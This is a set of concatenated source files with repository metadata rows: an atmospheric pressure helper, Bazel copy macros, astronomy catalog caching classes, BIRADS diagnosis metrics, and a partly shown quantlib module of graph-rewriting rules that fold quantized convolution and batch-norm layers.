pres[:, k, :, :] = (pres_2 - pres_1) / np.log(pres_2 / pres_1)
pres.name = "pres_pa_mid"
pres.attrs["units"] = "pa"
pres.attrs["long_name"] = "Pressure Mid Layer in Pa"
return pres
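# --- Editor's note: illustrative sketch, not part of the original module. ---
# A tiny numeric check of the hybrid-coordinate formulas documented in
# _calc_pressure, using made-up ak/bk constants (real values come from the
# model file's attributes).
def _example_pressure_formula():
    ak = np.array([0.0, 50.0, 100.0])   # hypothetical hybrid "a" constants [Pa]
    bk = np.array([1.0, 0.8, 0.6])      # hypothetical hybrid "b" constants
    surfpres = 101325.0                 # surface pressure [Pa]
    phalf = ak + surfpres * bk          # interface pressures: a(k) + psfc * b(k)
    # mid-layer pressures between consecutive interfaces
    pfull = (phalf[1:] - phalf[:-1]) / np.log(phalf[1:] / phalf[:-1])
    return pfull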
| 29.569356 | 112 | 0.508079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14,252 | 0.436977 |
5fc818c5836435c92ae4ef2d17b3e1e01d7c0fde | 816 | bzl | Python | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | build/build.bzl | abaer123/gitlab-agent | 71c94d781ae2a7ae2851bb946c37fe01b1ed3da0 | [
"MIT"
] | null | null | null | load("@com_github_atlassian_bazel_tools//multirun:def.bzl", "command")
load("@bazel_skylib//lib:shell.bzl", "shell")
def copy_to_workspace(name, label, file_to_copy, workspace_relative_target_directory):
command(
name = name,
command = "//build:copy_to_workspace",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy, workspace_relative_target_directory],
visibility = ["//visibility:public"],
)
# This macro expects the target directory for the file as an additional command-line argument.
def copy_absolute(name, label, file_to_copy):
command(
name = name,
command = "//build:copy_absolute",
data = [label],
arguments = ["$(rootpaths %s)" % label, file_to_copy],
visibility = ["//visibility:public"],
)
| 37.090909 | 99 | 0.658088 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 315 | 0.386029 |
5fc9836cfddecb88f1956951f281f1c8d40b8f81 | 4,471 | py | Python | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 7 | 2016-05-20T21:56:39.000Z | 2022-02-07T21:09:48.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2019-03-21T16:10:04.000Z | 2019-03-22T17:21:56.000Z | CAAPR/CAAPR_AstroMagic/PTS/pts/magic/catalog/catalog.py | wdobbels/CAAPR | 50d0b32642a61af614c22f1c6dc3c4a00a1e71a3 | [
"MIT"
] | 1 | 2020-05-19T16:17:17.000Z | 2020-05-19T16:17:17.000Z | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.catalog.catalog Contains the GalacticCatalog and StellarCatalog classes.
# -----------------------------------------------------------------
# Ensure Python 3 functionality
from __future__ import absolute_import, division, print_function
# Import the relevant PTS classes and modules
from ..tools import catalogs
from ...core.tools import introspection, tables
from ...core.tools import filesystem as fs
# -----------------------------------------------------------------
catalogs_user_path = fs.join(introspection.pts_user_dir, "catalogs")
# -----------------------------------------------------------------
class GalacticCatalog(object):
"""
    Locally cached catalog of galaxies covering the sky region of a frame or WCS.
"""
def __init__(self, frame_or_wcs):
"""
The constructor ...
:param frame_or_wcs:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
# Determine the path to the 'galaxies' catalog path
galaxies_catalog_path = fs.join(catalogs_user_path, "galaxies")
        # Create the catalogs/galaxies directory if necessary
if not fs.is_directory(galaxies_catalog_path): fs.create_directory(galaxies_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(galaxies_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_galaxy_catalog(frame_or_wcs)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
class StellarCatalog(object):
"""
    Locally cached catalog of stars covering the sky region of a frame or WCS.
"""
def __init__(self, frame_or_wcs, catalog_names="II/246"):
"""
This function ...
:param frame_or_wcs:
:param catalog_names:
:return:
"""
# Create the catalogs user directory if necessary
if not fs.is_directory(catalogs_user_path): fs.create_directory(catalogs_user_path)
        # Determine the path to the 'stars' catalog path
stars_catalog_path = fs.join(catalogs_user_path, "stars")
        # Create the catalogs/stars directory if necessary
if not fs.is_directory(stars_catalog_path): fs.create_directory(stars_catalog_path)
# Get the center coordinate and the range of RA and DEC
center, ra_span, dec_span = frame_or_wcs.coordinate_range
# Generate a unique string for the coordinate range
name = str(center) + "_" + str(ra_span) + "_" + str(dec_span)
# Determine the path to the catalog file
self.path = fs.join(stars_catalog_path, name + ".cat")
# Check whether the local file exists
if not fs.is_file(self.path):
# Get the table
self.table = catalogs.create_star_catalog(frame_or_wcs, catalog_names)
# Save the table
tables.write(self.table, self.path, format="ascii.ecsv")
# Load the table
else: self.table = tables.from_file(self.path, format="ascii.ecsv")
# -----------------------------------------------------------------
def saveto(self, path):
"""
This function ...
:param path:
:return:
"""
tables.write(self.table, path, format="ascii.ecsv")
# -----------------------------------------------------------------
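# Editor's note: hypothetical usage sketch, not part of the original module.
# Both catalogs are keyed on the frame's coordinate range, so repeated calls for
# the same sky region load the cached file instead of querying the services again.
def _example_catalog_usage(frame):
    galaxies = GalacticCatalog(frame)                      # galaxy catalog for this region
    stars = StellarCatalog(frame, catalog_names="II/246")  # 2MASS point-source catalog
    return galaxies.table, stars.table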
| 31.485915 | 97 | 0.547976 | 3,374 | 0.754472 | 0 | 0 | 0 | 0 | 0 | 0 | 2,269 | 0.507379 |
5fcaa9f085f2d78ed188a66c5c69d0728b2a6373 | 2,640 | py | Python | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | 5 | 2021-06-09T02:11:19.000Z | 2021-10-04T09:00:31.000Z | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | null | null | null | tools/common.py | JamzumSum/yNet | 78506738e64321cfd26f0af70a62dd2119948e39 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Iterable
import torch
from torchmetrics import ConfusionMatrix
from collections import defaultdict
argmax = lambda l: l.index(max(l))
BIRAD_MAP = ['2', '3', '4', '5']
def _lbm():
global BIRAD_MAP
BIRAD_MAP = torch.load("./data/BIRADs/meta.pt")['classname']['Yb']
@dataclass(frozen=True)
class DiagBag:
pid: str
pm: float
pb: list
ym: int
yb: int
@staticmethod
def header():
return [
'pid', 'malignant prob', 'BIRADs prob distrib', 'malignant anno',
'BIRADs anno'
]
def __iter__(self):
yield self.pid
yield f"{self.pm:.4f}"
yield '-' if self.pb is None else f"{BIRAD_MAP[argmax(self.pb)]}类 ({', '.join('%.4f' % i for i in self.pb)})"
yield str(self.ym)
yield '-' if self.yb is None else f"{BIRAD_MAP[self.yb]}类"
class Counter:
def __init__(self, diags: Iterable[DiagBag], thresh: float) -> None:
self.raw = tuple(diags)
self.K = len(BIRAD_MAP)
assert self.K >= 2
self.allInOne(thresh)
def allInOne(self, thresh):
cm = ConfusionMatrix(2, threshold=thresh)
cb = ConfusionMatrix(self.K)
cbm = ConfusionMatrix(self.K)
for d in self.raw:
cm.update(preds=torch.Tensor([d.pm]), target=torch.LongTensor([d.ym]))
cbm.update(preds=torch.Tensor([d.pb]), target=torch.LongTensor([int(d.pm > thresh)]))
if d.yb is not None:
cb.update(preds=torch.Tensor([d.pb]), target=torch.LongTensor([[d.yb]]))
self.cm = cm.compute()
self.cb = cb.compute()
self.cbm = cbm.compute()
@staticmethod
def _acc(cf):
return float(cf.diag().sum() / cf.sum())
    @staticmethod
    def _prec(cf: torch.Tensor):
        # torchmetrics confusion matrices are indexed [target, prediction],
        # so precision divides the diagonal by the prediction (column) sums.
        return (cf.diag() / cf.sum(dim=0).clamp_min_(1e-5)).tolist()
    @staticmethod
    def _recall(cf: torch.Tensor):
        # Recall divides the diagonal by the target (row) sums.
        return (cf.diag() / cf.sum(dim=1).clamp_min_(1e-5)).tolist()
@property
def pb_acc(self):
return self._acc(self.cb)
@property
def pm_acc(self):
return self._acc(self.cm)
@property
def pb_precision(self):
return self._prec(self.cb)
@property
def pb_recall(self):
return self._recall(self.cb)
@property
def pm_precision(self):
return self._prec(self.cm)
@property
def pm_recall(self):
return self._recall(self.cm)
@property
def m_birad(self):
return self.cbm[1].int().tolist()
@property
def b_birad(self):
return self.cbm[0].int().tolist()
_lbm()
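# Editor's note: hypothetical usage sketch, not part of the original module.
# It assumes the default 4-class BIRAD_MAP; the numbers below are made up.
def _example_counter():
    diags = [
        DiagBag(pid="case0", pm=0.91, pb=[0.1, 0.1, 0.2, 0.6], ym=1, yb=3),
        DiagBag(pid="case1", pm=0.12, pb=[0.7, 0.1, 0.1, 0.1], ym=0, yb=0),
    ]
    counter = Counter(diags, thresh=0.5)
    return counter.pm_acc, counter.pb_acc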
| 24.220183 | 117 | 0.591667 | 2,277 | 0.861195 | 289 | 0.109304 | 1,441 | 0.545008 | 0 | 0 | 246 | 0.093041 |
5fcb3be04540c3af2931e387575e6b75d7da7f7e | 34,361 | py | Python | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | null | null | null | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | null | null | null | quantlib/backends/twn_accelerator/grrules/dporules.py | mdatres/quantlab | 09fb24ede78f49768f829afe0fac2ac291b8fd4f | [
"Apache-2.0"
] | 1 | 2022-01-02T10:10:46.000Z | 2022-01-02T10:10:46.000Z | #
# dporules.py
#
# Author(s):
# Matteo Spallanzani <[email protected]>
#
# Copyright (c) 2020-2021 ETH Zurich.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import networkx as nx
from collections import OrderedDict
import itertools
import math
import torch
import torch.nn as nn
import quantlib.editing.graphs as qg
from quantlib.editing.graphs.grrules.dporules import DPORule
from quantlib.editing.graphs.grrules import Seeker
from quantlib.editing.graphs.graphs.nodes import Bipartite, __NODE_ID_FORMAT__, PyTorchNode
import quantlib.algorithms as qa
from .folding import foldsteinqconvbnste, foldconvbnste, foldsteinqconvbn
__all__ = [
'FoldSTEINQConvBNSTETypeARule',
'FoldSTEINQConvBNSTETypeBRule',
'FoldConvBNSTERule',
'FoldSTEINQConvBNRule',
]
class FoldSTEINQConvBNSTETypeARule(DPORule): # w/o max pooling
def __init__(self, gamma_int_bits=10, gamma_frac_bits=17, beta_int_bits=8, beta_frac_bits=0):
self._gamma_int_bits = gamma_int_bits
self._gamma_frac_bits = gamma_frac_bits
self._beta_int_bits = beta_int_bits
self._beta_frac_bits = beta_frac_bits
# Nodes of the interface
K_types = OrderedDict()
K_types.update({'HPTout': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
# Nodes in the core template graph
LK_types = OrderedDict()
LK_types.update({'STEin': qa.ste.STEActivation.__name__})
LK_types.update({'Conv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'STEout': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
# Nodes in the core replacement graph
RK_types = OrderedDict()
RK_types.update({'TWConv': nn.Conv2d.__name__})
RK_types.update({'XPAffine': nn.Conv2d.__name__})
RK_types.update({'S&C': qg.graphs.ShiftAndClip.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
# Define arcs between nodes in full template graph
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
        # Here, the graph contains only operation (kernel) nodes;
        # this is what the seeker needs to match against.
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
        # disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application;
        # a fibre fixes one endpoint (the context node) and collects all arcs sharing it,
        # like fixing one argument of a two-argument function and enumerating the rest
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
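        # For instance, in this rule E_K2RK = {('K-term/HPTout', 'R-term/TWConv')}, so
        # F_K2RK maps 'K-term/HPTout' to that single-arc set and 'K-term/HPTin' to the
        # empty set; apply() can then look up a context node's glue arcs in O(1)
        # instead of rescanning the full edge sets.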
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FINQBNSTETA', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mstein = nodes_dict[g_L2H['/'.join(['L-term', 'STEin'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
msteout = nodes_dict[g_L2H['/'.join(['L-term', 'STEout'])]].nobj
# fold
weight, gamma, beta = foldsteinqconvbnste(mstein.num_levels, mstein.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
msteout.num_levels, msteout.abs_max_value,
gamma_int_bits=self._gamma_int_bits, gamma_frac_bits=self._gamma_frac_bits,
beta_int_bits=self._beta_int_bits, beta_frac_bits=self._beta_frac_bits)
# build the new modules
mtwconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=minq2d.bias is not None).to(torch.device('cpu'))
mtwconv.weight.data = weight
mxpaffine = nn.Conv2d(minq2d.out_channels, minq2d.out_channels, 1,
stride=1, padding=0, groups=minq2d.out_channels,
bias=True).to(torch.device('cpu'))
mxpaffine.weight.data = gamma
mxpaffine.bias.data = beta
msandc = qg.graphs.ShiftAndClip(n_bits=math.ceil(math.log(msteout.num_levels, 2)),
shift=self._gamma_frac_bits,
signed=True, only_positive=True).to(torch.device('cpu'))
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'TWConv'])]] = PyTorchNode(mtwconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'XPAffine'])]] = PyTorchNode(mxpaffine)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'S&C'])]] = PyTorchNode(msandc)
return JI, vJI_2_ptnode
# G: Full/original graph
# nodes_dict: Mapping between node identifiers of G and actual underlying objects
    # g: one of the occurrences of the template in G, i.e. one application point for the replacement rule -> one morphism
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
# Dictionary mapping of node identifiers to a payload
# keys in nodes_dict should be the same as G.nodes
nodes_dict = {**nodes_dict}
# characterise the match graph H
# Occurence of template in the graph
# SPMATTEO: Some assumptions to discuss
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)} # Occurence of context
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)} # Occurence of core template
HI = G.subgraph(VHI) # HI is the subgraph induced by the set of nodes VHI
# generate the substitute (sub-)graph J\I (completely detached from G)
# Instantiate blueprint of the replacement graph
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI) # G now has two connected but 'independent' subgraphs
nodes_dict.update(vJI_2_ptnode) # Add new payloads from substitute graph
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI: # for each node in the interface subgraph of G
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]}) # incoming interface connections from G to substitute graph
            G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})  # outgoing interface connections from substitute graph to G
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
# Specific to integer arithmetic transformation -> No relation to graph editing, per-se
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
# Assumption: removing a node also removes all arcs pointing to or from that node
G.remove_nodes_from(set(HI.nodes))
# Remove the payload, i.e. underying objects, accordingly
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldSTEINQConvBNSTETypeBRule(DPORule):  # w/ max pooling
def __init__(self, gamma_int_bits=10, gamma_frac_bits=17, beta_int_bits=8, beta_frac_bits=0):
self._gamma_int_bits = gamma_int_bits
self._gamma_frac_bits = gamma_frac_bits
self._beta_int_bits = beta_int_bits
self._beta_frac_bits = beta_frac_bits
K_types = OrderedDict()
K_types.update({'HPTout': qg.graphs.HelperOutputPrecisionTunnel.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'STEin': qa.ste.STEActivation.__name__})
LK_types.update({'Conv': qa.inq.INQConv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'MaxPool': nn.MaxPool2d.__name__})
LK_types.update({'STEout': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'TWConv': nn.Conv2d.__name__})
RK_types.update({'XPAffine': nn.Conv2d.__name__})
RK_types.update({'S&C': qg.graphs.ShiftAndClip.__name__})
RK_types.update({'MaxPool': nn.MaxPool2d.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
VK = set(K_node_IDs) # precision tunnel nodes define the context graph
self.K = self.L.subgraph(VK)
# define the template (sub-)graph L\K
VLK = set(self.L.nodes).difference(set(self.K.nodes))
self.LK = self.L.subgraph(VLK)
# define the replacement (sub-)graph R\K ["gluing" R\K to K yields the graph R, i.e., the R-term]
self.RK = nx.DiGraph()
self.RK.add_edges_from({(u, v) for u, v in zip(RK_node_IDs[:-1], RK_node_IDs[1:])})
nx.set_node_attributes(self.RK, {vRK: Bipartite.KERNEL for vRK in set(self.RK.nodes)}, 'bipartite')
nx.set_node_attributes(self.RK, RK_types, 'type')
# define the arcs that go from the vertices of K to those of R\K, and viceversa
E_K2RK = {(K_node_IDs[0], RK_node_IDs[0])}
E_RK2K = {(RK_node_IDs[-1], K_node_IDs[-1])}
E_K2RK2K = E_K2RK | E_RK2K
# disintegrate `E_K2RK` and `E_RK2K` along fibres to speed up rule application
self.F_K2RK = {vK: set(arc for arc in E_K2RK if arc[0] == vK) for vK in set(self.K.nodes)}
self.F_RK2K = {vK: set(arc for arc in E_RK2K if arc[1] == vK) for vK in set(self.K.nodes)}
# # glue together the (sub-)graphs L\K and R\K along the vertices of K
# self.S = nx.compose(self.L, self.RK)
# self.S.add_edges_from(E_K2RK2K)
# since the GRR's L-term has been modified, rebuild the seeker
self.seeker = Seeker(self.L)
# this machinery can generate always-new identifiers for different rule applications
self._counter = itertools.count()
def _get_rule_count(self):
rule_count = ''.join(['FINQBNSTETB', __NODE_ID_FORMAT__.format(next(self._counter))])
return rule_count
def core(self, HI, g, nodes_dict):
# generate the substitute (sub-)graph J\I
rule_count = self._get_rule_count()
g_RK2JI = {vRK: '_'.join([rule_count, vRK.replace('R-term/', '')]) for vRK in set(self.RK.nodes)}
JI = nx.relabel_nodes(self.RK, g_RK2JI, copy=True)
# get pointers to the old modules;
# these pointers will enable two actions:
# 1. extracting the arguments required to perform the folding
# 2. extracting the parameters to instantiate the new modules
g_L2H = {vL: vH for vH, vL in g.items()}
mstein = nodes_dict[g_L2H['/'.join(['L-term', 'STEin'])]].nobj
minq2d = nodes_dict[g_L2H['/'.join(['L-term', 'Conv'])]].nobj
mbn2d = nodes_dict[g_L2H['/'.join(['L-term', 'BatchNorm'])]].nobj
msteout = nodes_dict[g_L2H['/'.join(['L-term', 'STEout'])]].nobj
mmxpold = nodes_dict[g_L2H['/'.join(['L-term', 'MaxPool'])]].nobj
# fold
weight, gamma, beta = foldsteinqconvbnste(mstein.num_levels, mstein.abs_max_value,
minq2d.weight_frozen,
mbn2d.running_mean, mbn2d.running_var, mbn2d.eps, mbn2d.weight, mbn2d.bias,
msteout.num_levels, msteout.abs_max_value,
gamma_int_bits=self._gamma_int_bits, gamma_frac_bits=self._gamma_frac_bits,
beta_int_bits=self._beta_int_bits, beta_frac_bits=self._beta_frac_bits)
# build the new modules
mtwconv = nn.Conv2d(minq2d.in_channels, minq2d.out_channels, minq2d.kernel_size,
stride=minq2d.stride, padding=minq2d.padding, dilation=minq2d.dilation, groups=minq2d.groups,
bias=minq2d.bias is not None).to(torch.device('cpu'))
mtwconv.weight.data = weight
mxpaffine = nn.Conv2d(minq2d.out_channels, minq2d.out_channels, 1,
stride=1, padding=0, groups=minq2d.out_channels,
bias=True).to(torch.device('cpu'))
mxpaffine.weight.data = gamma
mxpaffine.bias.data = beta
msandc = qg.graphs.ShiftAndClip(n_bits=math.ceil(math.log(msteout.num_levels, 2)),
shift=self._gamma_frac_bits,
signed=True, only_positive=True).to(torch.device('cpu'))
mmxpnew = nn.MaxPool2d(kernel_size=mmxpold.kernel_size, stride=mmxpold.stride, padding=mmxpold.padding)
# register the newly created nodes
vJI_2_ptnode = {}
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'TWConv'])]] = PyTorchNode(mtwconv)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'XPAffine'])]] = PyTorchNode(mxpaffine)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'S&C'])]] = PyTorchNode(msandc)
vJI_2_ptnode[g_RK2JI['/'.join(['R-term', 'MaxPool'])]] = PyTorchNode(mmxpnew)
return JI, vJI_2_ptnode
def apply(self, G, nodes_dict, g):
# create new containers
G = G.copy()
nodes_dict = {**nodes_dict}
# characterise the match graph H
VI = {vH for vH, vL in g.items() if vL in set(self.K.nodes)}
VHI = {vH for vH, vL in g.items() if vL not in set(self.K.nodes)}
HI = G.subgraph(VHI)
# generate the substitute (sub-)graph J\I
JI, vJI_2_ptnode = self.core(HI, g, nodes_dict)
# add the substitute (sub-)graph J\I to the main graph G
G = nx.compose(G, JI)
nodes_dict.update(vJI_2_ptnode)
# glue the substitute (sub-)graph J\I to the interface (sub-)graph I
JI2RK_morphisms = Seeker(self.RK).get_morphisms(JI)
assert len(JI2RK_morphisms) == 1
g_JI2RK = JI2RK_morphisms[0]
g_RK2JI = {vRK: vJI for vJI, vRK in g_JI2RK.items()}
for vI in VI:
vK = g[vI]
G.add_edges_from({(vI, g_RK2JI[vRK]) for (_, vRK) in self.F_K2RK[vK]})
G.add_edges_from({(g_RK2JI[vRK], vI) for (vRK, _) in self.F_RK2K[vK]})
# the new modules are fully integerized, so the precision tunnel should not embed integer numbers in floating point numbers
if nodes_dict[vI].ntype == qg.graphs.HelperOutputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperOutputPrecisionTunnel(1.0))
elif nodes_dict[vI].ntype == qg.graphs.HelperInputPrecisionTunnel.__name__:
nodes_dict[vI] = PyTorchNode(qg.graphs.HelperInputPrecisionTunnel(1.0))
else:
raise TypeError # interface nodes should be objects of class `qg.graphs.HelperPrecisionTunnel` only
# discard the match (sub-)graph H\I
G.remove_nodes_from(set(HI.nodes))
for vHI in VHI:
del nodes_dict[vHI]
return G, nodes_dict
def seek(self, G, nodes_dict):
gs = self.seeker.get_morphisms(G)
return gs
class FoldConvBNSTERule(DPORule):
def __init__(self):
K_types = OrderedDict()
K_types.update({'HI': qg.graphs.HelperInput.__name__})
K_types.update({'HPTin': qg.graphs.HelperInputPrecisionTunnel.__name__})
K_types = OrderedDict([('/'.join(['K-term', k]), v) for k, v in K_types.items()])
LK_types = OrderedDict()
LK_types.update({'Conv': nn.Conv2d.__name__})
LK_types.update({'BatchNorm': nn.BatchNorm2d.__name__})
LK_types.update({'ReLU': nn.ReLU.__name__})
LK_types.update({'STE': qa.ste.STEActivation.__name__})
LK_types = OrderedDict([('/'.join(['L-term', k]), v) for k, v in LK_types.items()])
RK_types = OrderedDict()
RK_types.update({'Conv': nn.Conv2d.__name__})
RK_types.update({'F&C': qg.graphs.FloorAndClip.__name__})
RK_types = OrderedDict([('/'.join(['R-term', k]), v) for k, v in RK_types.items()])
K_node_IDs = list(K_types.keys())
LK_node_IDs = list(LK_types.keys())
RK_node_IDs = list(RK_types.keys())
# define the template graph L [L-term]
L_node_IDs = [K_node_IDs[0]] + LK_node_IDs + [K_node_IDs[-1]]
self.L = nx.DiGraph()
self.L.add_edges_from({(u, v) for u, v in zip(L_node_IDs[:-1], L_node_IDs[1:])})
nx.set_node_attributes(self.L, {vL: Bipartite.KERNEL for vL in set(self.L.nodes)}, 'bipartite')
nx.set_node_attributes(self.L, {**K_types, **LK_types}, 'type')
# define the context (sub-)graph K [K-term]
